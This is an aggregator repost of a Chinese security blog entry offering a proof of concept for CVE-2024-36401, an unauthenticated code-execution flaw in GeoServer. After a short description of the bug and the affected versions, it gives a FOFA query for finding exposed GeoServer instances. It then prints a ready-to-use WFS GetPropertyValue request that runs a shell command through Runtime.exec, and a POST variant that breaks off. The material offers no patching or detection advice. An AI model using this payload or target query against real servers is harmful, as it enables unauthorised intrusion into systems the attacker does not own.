注册    登录
专栏名称: 橘猫学安全
每日一干货🙂
我也要提交微信公众号
今天看啥
微信公众号rss订阅, 微信rss, 稳定的RSS源
目录
今天看啥  ›  专栏  ›  橘猫学安全

CVE-2024-36401 POC

橘猫学安全  · 公众号  ·  · 2024-08-06 08:51

文章预览

GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401) GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。 fofa app="GeoServer" poc GET   /geoserver/wfs?service=WFS =2.0.0 =GetPropertyValue =sf:archsites =exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Connection: close Cache-Control: max-age=0 POST   /geoserver/wfs HTTP/1.1 Host: your-ip:8080 Accept-Enc ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览
推荐文章
ZaomeDesign  ·  新作 | 传承过去,焦距现在:海尔(无锡)物联网示范基地 / 印文设计
2 天前
摘星DSE  ·  内地品牌在港不招35岁以上被怒斥!香港工作环境好吗?毕业后工资多少?
5 天前
人力资源管理  ·  今年这件羊毛马甲简直太“香”了!这个价格建议人手一件!
6 天前
关于   移动版   ·   Py中国   ·   RSS之家   ·   CodingPro   ·   Code   ·   Link之家   ·   卧龙AI搜索   ·   小百科
今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源
© 2024 ~ 沪ICP备11025650号